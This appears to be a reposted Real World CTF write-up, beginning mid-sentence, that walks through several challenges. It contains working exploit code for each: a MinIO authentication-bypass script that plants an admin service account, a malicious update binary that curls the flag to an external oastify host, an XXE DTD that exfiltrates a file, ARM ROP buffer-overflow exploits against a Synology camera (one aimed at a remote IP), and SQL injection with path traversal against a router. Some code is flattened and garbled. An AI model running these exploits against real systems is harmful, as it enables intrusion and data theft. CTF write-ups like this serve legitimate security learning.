curl http://127.0.0.1:8080/ -H "Cookie: JSESSIONID=910666EC33F0B928D05C3C277397DBC5" --limit-rate 1K -F "files=@payload" -X GETThis should leave us plenty of time to then use Burp Suite to spray the endpoint /notify?fname=..%5cproc/self/fd/[10-25], until eventually we use the same process that is processing the file upload and hit the correct fd triggering our SSTI, giving us RCE and the flag.
minioday
Relevant CVE: https://github.com/minio/minio/security/advisories/GHSA-2pxw-r47w-4p8c
Patch: https://github.com/minio/minio/pull/16849/files
The provided attachment contains a pre-generated service account with the required permissions to abuse the CVE:
{"version":1,"credentials":{"accessKey":"Vmd6q3aw2eOEmZ6l","secretKey":"eeuG1b8vW15TPpaN1fP9funQJdDG5wQy","sessionToken":"eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhY2Nlc3NLZXkiOiJWbWQ2cTNhdzJlT0VtWjZsIiwicGFyZW50IjoicndjdGYiLCJzYS1wb2xpY3kiOiJlbWJlZGRlZC1wb2xpY3kiLCJzZXNzaW9uUG9saWN5IjoiZXlKV1pYSnphVzl1SWpvaU1qQXhNaTB4TUMweE55SXNJbE4wWVhSbGJXVnVkQ0k2VzNzaVJXWm1aV04wSWpvaVFXeHNiM2NpTENKQlkzUnBiMjRpT2xzaWN6TTZLaUpkTENKU1pYTnZkWEpqWlNJNld5SmhjbTQ2WVhkek9uTXpPam82S2lKZGZWMTkifQ.ptjboEMwWhfvl16Jy1gVpinTN7CpFjpy1NKO50RKkjjwzZfvFw-a7-mQnyjFeekxGLqhfIiC6az2kfA1E_Z6qg","expiration":"1970-01-01T00:00:00Z","status":"on","parentUser":"rwctf"},"updatedAt":"2023-11-15T05:38:23.652266083Z"}The cause of the exploit is the regex multipart/form-data*, where a is interpreted as 0 or more matches. This allows us to trigger the endpoint with POST multipart/form-dat prefix in the Content-Type header.
Additionally, the code marked as vulnerable in the CVE checks that the reserved buckets are not the target of the upload:
// For all other requests reject access to reserved bucketsbucketName, _ := request2BucketObjectName(r)if isMinioReservedBucket(bucketName) || isMinioMetaBucket(bucketName) {if !guessIsRPCReq(r) && !guessIsBrowserReq(r) && !guessIsHealthCheckReq(r) && !guessIsMetricsReq(r) && !isAdminReq(r) && !isKMSReq(r) {if ok {tc.FuncName = "handler.ValidRequest"tc.ResponseRecorder.LogErrBody = true}writeErrorResponse(r.Context(), w, errorCodes.ToAPIErr(ErrAllAccessDisabled), r.URL)return}}
So in theory, if we can pass the guessIsBrowserReq check, we will be allowed to target the .minio.sys bucket where we can configure minio (e.g. add our own admin credentials). The check looks like this:
func guessIsBrowserReq(r *http.Request) bool {aType := getRequestAuthType(r)return strings.Contains(r.Header.Get("User-Agent"), "Mozilla") &&globalBrowserEnabled && aType == authTypeAnonymous}
We can set our User-Agent header to Mozilla to pass the first check, the web UI is enabled so the second check is automatically passed, and then we need to have anonymous auth type. The issue is, that function checks if we provide any kind of credentials, so either we fail the check or can’t provide the credentials to upload files. Luckily, the following function which would count us as authenticated can be combined with the multipart/form-dat prefix observation:
// Verify if request has AWS Post policy Signature Version '4'.func isRequestPostPolicySignatureV4(r *http.Request) bool {return strings.Contains(r.Header.Get(xhttp.ContentType), "multipart/form-data") &&r.Method == http.MethodPost}
As long as we don’t send multipart/form-data, we will be counted as browser request. Though for our payload to be properly parsed, we still need to match multipart/form-data header, which can be achieved by capitalizing the last a so that we’re still sending valid multipart request, trigger the PostPolicyHandler, and count as a browser request thus allowing access to .minio.sys bucket.
We can use the following payload, note that you have to intercept the request in the proxy and add the ; boundary=... suffix to the Content-Type header (as I was too lazy to figure out how to do this properly in Python). This will upload our new service account (iLHVV2ZMFuwf7SmH:aODcevBptB0hQychqcH569miG78euGbZ) that has full access:
import requestsimport ioimport base64import hashlibimport hmactarget = 'http://127.0.0.1:9000' # minio apiaccess_key = 'Vmd6q3aw2eOEmZ6l'secret_key = 'eeuG1b8vW15TPpaN1fP9funQJdDG5wQy'session = requests.Session()session.proxies.update({'http': 'http://127.0.0.1:8080'})def calculateSignature(policy, secret_key):hashed = hmac.new(secret_key, policy, hashlib.sha1)return base64.b64encode(hashed.digest())bucket_name = 'images'policy = base64.b64encode(''.encode())# iLHVV2ZMFuwf7SmH# aODcevBptB0hQychqcH569miG78euGbZ"""└─$ mc alias set rwctf http://127.0.0.1:9000Enter Access Key: iLHVV2ZMFuwf7SmHEnter Secret Key:Added `rwctf` successfully."""res = session.post('%s/.minio.sys' % target, data = {'Key': 'config/iam/service-accounts/iLHVV2ZMFuwf7SmH/identity.json','Policy': policy,# signature v2'AWSAccessKeyId': access_key,'Signature': calculateSignature(policy, secret_key.encode()),}, files = {'file': io.BytesIO(b'{"version":1,"credentials":{"accessKey":"iLHVV2ZMFuwf7SmH","secretKey":"aODcevBptB0hQychqcH569miG78euGbZ","sessionToken":"eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhY2Nlc3NLZXkiOiJpTEhWVjJaTUZ1d2Y3U21IIiwicGFyZW50IjoicndjdGYiLCJzYS1wb2xpY3kiOiJlbWJlZGRlZC1wb2xpY3kiLCJzZXNzaW9uUG9saWN5IjoiZXlKV1pYSnphVzl1SWpvaU1qQXhNaTB4TUMweE55SXNJbE4wWVhSbGJXVnVkQ0k2VzNzaVJXWm1aV04wSWpvaVFXeHNiM2NpTENKQlkzUnBiMjRpT2xzaVlXUnRhVzQ2S2lKZGZTeDdJa1ZtWm1WamRDSTZJa0ZzYkc5M0lpd2lRV04wYVc5dUlqcGJJbXR0Y3pvcUlsMTlMSHNpUldabVpXTjBJam9pUVd4c2IzY2lMQ0pCWTNScGIyNGlPbHNpY3pNNktpSmRMQ0pTWlhOdmRYSmpaU0k2V3lKaGNtNDZZWGR6T25Nek9qbzZLaUpkZlYxOSJ9.ke6_YZEwUt5x792p4zXKKSfqtjszKNUj7CUTB3Qr6wvEJF2zr2js4a0ykAT3C3PzdvzdowofZJQuc66r0PNACw","expiration":"1970-01-01T00:00:00Z","status":"on","parentUser":"rwctf"},"updatedAt":"2024-01-27T14:29:34.662930444Z"}'),}, headers = {'User-Agent': 'Mozilla','Content-type': 'multipart/form-datA',})print(res.status_code, res.content)
Then, we just need to trigger an update using mc admin update with mirror pointed to our server (as the Dockerfile disabled signing key checks) with a malicious binary.
main.go:
package mainimport "os/exec"func main() {cmd := exec.Command("/bin/bash", "-c", "curl -F 'flag=@/flag' https://ugez646uv0q8toefw3xug5mi1970vqjf.oastify.com")cmd.Start()cmd.Wait()}
build.sh:
#!/bin/bashFILENAME="minio.RELEASE.2024-01-27T16-46-00Z"CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o $FILENAME -ldflags="-s -w -extldflags=-static" main.goshasum -a 256 $FILENAME > $FILENAME.sha256sum
Protected by Java SE
The server allows us to clone a git repository and run the following command:
/codeql/codeql/codeql query run -d[username] /tmp/trixter.ql -J-Djavax.xml.accessExternalDTD=allAs External DTD is explicitly allowed, it is fairly obvious that the goal is to do XXE. Decompiling the CLI’s source code we can find that there’s a legacy database (.dbinfo) supported, that is parsed from XML.
We can find a sample .dbinfo from GitHub search (or convert the yaml version to XML) and add DTD into it that exfils the flag:
.dbinfo:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://[...]/malicious.dtd"> %xxe;]><ns2:dbinfo xmlns:ns2="https://semmle.com/schemas/dbinfo"><sourceLocationPrefix>/opt</sourceLocationPrefix><baselineLinesOfCode>15853</baselineLinesOfCode><unicodeNewlines>false</unicodeNewlines><columnKind>utf16</columnKind><primaryLanguage>java</primaryLanguage><creationMetadata><sha>56f5b0f0fa788fb1248b0c9e4a89ba144403986d</sha><cliVersion>2.8.3</cliVersion><creationTime>2022-03-28T18:50:50.504690874Z</creationTime></creationMetadata></ns2:dbinfo>
malicious.dtd:
<!ENTITY % file SYSTEM "file:///flag"><!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://5djokf3pmge8p9874dpyt87jrax1lu9j.oastify.com/?x=%file;'>">%eval;%exfiltrate;
Then, we just upload this to a git repository, clone it, and run a query with anything in it to trigger the exploit and get the flag.
PWN
Let’s party in the house
TL;DR:
Exploit a buffer overflow in libjansson.so.4.7.0 to achieve RCE.
Finding the bug:
When we started, we guessed it was probably a buffer overflow shown at Pwn2Own Toronto. However, because we couldn’t find any proper resources, we got to reversing.
1st approach: diffing:
Since we know the version given to us, we decided to diff with the version we knew fixed the bug. This proved more tedious than planned, as we weren’t given a .cpio file directly.
When reversing the firmware, we noticed that the function at 00054a54 in /bin/systemd was likely to be the firmware parser. Using that function as a base, we built this script:
from pwn import *import zlibf = open('Synology_BC500_1.0.7_0298.sa.bin','rb')header = f.read(0x7e)# print(header)num_sub_headers = u16(header[0x7c:])prescript_len = u32(f.read(4))prescript = zlib.decompress(f.read(prescript_len))postscript_len = u32(f.read(4))postscript = zlib.decompress(f.read(postscript_len))ff = open('pre-script.sh','wb')ff.write(prescript)ff.close()ff = open('post-script.sh','wb')ff.write(postscript)ff.close()def read_sub_header(i):sub_header = f.read(0x48)name, subscript_len, image_len = sub_header[:0x40], u32(sub_header[0x40:0x44]), u32(sub_header[0x44:])subscript = zlib.decompress(f.read(subscript_len))image = zlib.decompress(f.read(image_len))ff = open(f'ex-script{i}','wb')ff.write(subscript)ff.close()ff = open(f'image{i}','wb')ff.write(image)ff.close()for i in range(num_sub_headers):read_sub_header(i)
This allowed us to extract scripts and images from the firmware.
We ended up with 4 images, that after a bit of digging we associated like this:
image0 - kernelimage1 - rootfsimage2 - loaderimage3 - fdt
At this point, we wanted to mount the rootfs, however it was in a UBI format and we never could extract / mount it. This is a beautiful showcase of something called “big skill issue”.
This led to us stopping trying to diff anything.
2nd approach: googling:
While trying to come up with a solution to diff, one of the team mate sent this link(https://teamt5.org/en/posts/teamt5-pwn2own-contest-experience-sharing-and-vulnerability-demonstration/) to a small post by TeamT5, briefly explaining how they exploited the Camera. After a bit of looking around, we found that the function at 0x6ad4 (later renamed to parse_object) is the one they exploited.
From that, we knew that the buffer overflow is from a scanf("%s %s") and that it was in /lib/libjansson.so.4.7.0. We got to reversing and found out that the best way to reach that vulnerable scanf is by reaching json_loads.
We noticed that that function was used in /www/camera-cgi/synocam_param.cgi.
After a bit of renaming/retyping, this is what it looked like:
Each HandleHttp* called json_loads at some point. With that, we built a small PoC that should lead to a crash from the .cgi.
import requestsimport jsonurl = 'http://127.0.0.1:8080/syno-api/security/info/language'header = {'Cookie':'sid=123'}json = [{'a':'','a aaaaaaaaaaaaaaaaaaaabbbb':'',}]res = requests.post(url, json=json, headers=header)print(res.text)
We knew it crashed because when running it, our script would error on a connection closed bug.
In parallel, we got a gdbserver(https://github.com/hacksysteam/gdb-cross-compiler/releases) and got it to run by adding this script to to /etc/init.d/S50_IPcamApp.
echo "INIT GDBSERVER"if /bin/gdbserver --multi localhost:1337 /bin/sh ; thenecho "GDBSERVER INIT SUCCESS"elseecho "GDBSERVER INIT FAIL"fi
Then, adding
-nic user,hostfwd=tcp:0.0.0.0:8080-:80,hostfwd=tcp:0.0.0.0:1337-:1337 to the provided run.sh would allow us to connect.
Exploiting:
During the exploitation, we actually tried many different way to ropchain our way to RCE. Due to various limitation, such as no null bytes and the addresses can’t contain any char > 0x80, we were stuck for a good while.
Still, we came up with this script:
import requestsimport jsonfrom pwn import *libc = ELF("./libc-2.30.so")r = remote('127.0.0.1', 8080)context.arch = "arm"url = 'http://127.0.0.1:8080/syno-api/security/info/language'header = {'Cookie':'sid=123'}#target layout#0x7e9b2328: 0x0000000000000038 0x7e9b242800000004#0x7e9b2338: 0x0000006100000000 0x0000007c00000000#0x7e9b2348: 0x7b9b242000000001 0x000000017bf7350c#0x7e9b2358: 0x7e9b24007e9b2373 0x7e9b242800000000#0x7e9b2368: 0x0050f5680000001a 0x0050f4d00050f5d0#gef#0x7e9b2378: 0x76f300d47e9b23a4 0x000000000000007b#0x7e9b2388: 0x7e9b242800000004 0x7e9b242800000000#0x7e9b2398: 0x0000007b00000000 0x76f2fe247e9b23c4#0x7e9b23a8: 0x0000000000000000 0x7e9b242800000004#0x7e9b23b8: 0x0050f4805b00005b 0x76f300ec7e9b23ecbase = 0x450000execve_off = 0x52eccmov_r0 = 0x000310f4 # : mov r0, r3; pop {fp, pc};pop_r3 = 0x0000654c # : pop {r3, pc};pop_r0 = 0x000d4c60 # : pop {r0, r1, r2, r3, ip, lr}; bx ip;guessed_base = 0x76755000guessed_libc_base = guessed_base + 0x41000guessed_libc_exit = guessed_libc_base + 0x2f368log.info(f"GUESSED_BASE: {hex(guessed_base)}")log.info(f"GUESSED EXIT: {hex(guessed_libc_exit)}")log.info(f"pop_r0: {hex(guessed_libc_base + pop_r0)}")payload = b'[{"a ' + b'C'*204 + p32(0x42424242) + p32(0x41414141)+ b'":"","a ":""}]'start = b'POST /syno-api/security/info/language HTTP/1.1rnHost: 127.0.0.1:8080rnContent-Type:application/jsonrn'header2 = b"Cookie:sid=123rn"leng = b"Content-Length: " + bytes(str(len(payload)), "utf-8") + b"rnrn"oad)log.info(start+header2+leng+payload)r.send(start+header2+leng+payload)r.interactive()
Since we only have to guess the 0x4x of base, the success rate was 1/16, which is pretty good. However, for some obscure reason the command never got executed.
A team mate spent some time debugging and ended up being able to execute commands. He ran the exploit and saw a flag in index.html. He then ran it on remote, and voilà!
This was the updated and final exploit:
import requestsimport jsonfrom pwn import *r = remote('47.88.48.133', 36344)url = 'http://127.0.0.1:8080/syno-api/security/info/language'header = {'Cookie':'sid=123'}#target layout#0x7e9b2328: 0x0000000000000038 0x7e9b242800000004#0x7e9b2338: 0x0000006100000000 0x0000007c00000000#0x7e9b2348: 0x7b9b242000000001 0x000000017bf7350c#0x7e9b2358: 0x7e9b24007e9b2373 0x7e9b242800000000#0x7e9b2368: 0x0050f5680000001a 0x0050f4d00050f5d0#gef#0x7e9b2378: 0x76f300d47e9b23a4 0x000000000000007b#0x7e9b2388: 0x7e9b242800000004 0x7e9b242800000000#0x7e9b2398: 0x0000007b00000000 0x76f2fe247e9b23c4#0x7e9b23a8: 0x0000000000000000 0x7e9b242800000004#0x7e9b23b8: 0x0050f4805b00005b 0x76f300ec7e9b23eclibc_base = 0x76795000binary_base = 0x400000popen_off = 0x14d60execve_off = 0x52eccmov_r0 = 0x000310f4 # : mov r0, r3; pop {fp, pc};pop_r3 = 0x0000654c # : pop {r3, pc};system_off = 0x6DC040final_payload = b''target_string = 0x4c5a40start = b'[{'entry = b'"'seperate = b'":"",'end = b'":""}]'payload = start + entrypayload += b'b":"' + b'b'*0x1000+b'cat /flag'payload += b'","'payload += b'c":"' + b' '*0xff0+b'cat /flag > /www/index.html'payload += b'","'payload += b'whoami":"","'payload += b'a'*(204+36)payload += p32(target_string)[:3]payload += b" "payload += b'C'*204payload += p32(binary_base + popen_off)[:3]payload += endstart = b'POST /syno-api/security/info/language HTTP/1.1rnHost: 127.0.0.1:8080rnContent-Type:application/jsonrn'header2 = b"Cookie:sid=123rn"leng = b"Content-Length: {}rnrn".format(len(payload))log.info(start+header2+leng+payload)r.send(start+header2+leng+payload)r.interactive()
Router4A
In mode_webdav.so, it first checks for invalid characters and then do url decode when handle PROPFINDMEDIALIST request, making it easy to bypass the check with %27.
However, the database includes a distinct DETAILS table and lacks the OBJECTS and ALBUM_ART tables, resulting in several functions not functioning as intended.
GETMUSICCLASSIFICATION method has get_album_cover_image method which can load file content and leak.
If we want to use GETMUSICCLASSIFICATION to leak the flag, the first thing we need to do is change or create the table to make it work. This is easy to do.
val = ("a' OR 1 );ALTER TABLE DETAILS ADD COLUMN ALBUM_ART INTEGER DEFAULT 0; -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});val = ("a' OR 1 );ALTER TABLE DETAILS ADD COLUMN ARTIST TEXT COLLATE NOCASE; -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});val = ("a' OR 1 ); CREATE TABLE ALBUM_ART (ID INTEGER PRIMARY KEY AUTOINCREMENT, PATH TEXT NOT NULL); -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});val = ("a' OR 1 );CREATE TABLE OBJECTS(ID INTEGER PRIMARY KEY AUTOINCREMENT,OBJECT_ID TEXT UNIQUE NOT NULL,PARENT_ID TEXT NOT NULL,REF_ID TEXT,CLASS TEXT NOT NULL,DETAIL_ID INTEGER,NAME TEXT); -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});
After that, we need to pass a sql query in order to enter get_album_cover_image and load the path we inject.
To do so, we need to insert some data into the tables.
val = ("a' OR 1 ); INSERT INTO OBJECTS (PARENT_ID, OBJECT_ID, DETAIL_ID, CLASS) VALUES ('1$7', " + oId + ", " + dId + ", 'container.album.musicAlbum'); -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});val = ("a' OR 1 ); INSERT INTO ALBUM_ART (PATH, ID) VALUES ('" + path + "', " + pId + "); -- ").split("'").join("%27")console.log(val.length)await fetch("/RWCTF", {"headers": {"keyword": val,"mediatype": "1",},"body": "<?xml version="1.0" encoding="UTF-8" standalone="yes" ?><D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "PROPFINDMEDIALIST",});
The next thing to do is bypass the check for path which should start with /mnt, but /mnt is actually /tmp/mnt/ so the path should be /mnt/../../flag.
Then we can get the content of flag by calling GETMUSICCLASSIFICATION method.
await fetch("/RWCTF", {"headers": {"classify": "album",},"body": "<D:propfind xmlns:D="DAV:"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>","method": "GETMUSICCLASSIFICATION"}).then(a => a.text())
原文始发于微信公众号(山海之关):Real World CTF 6th writeup by Friendly Maltese Citizens
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论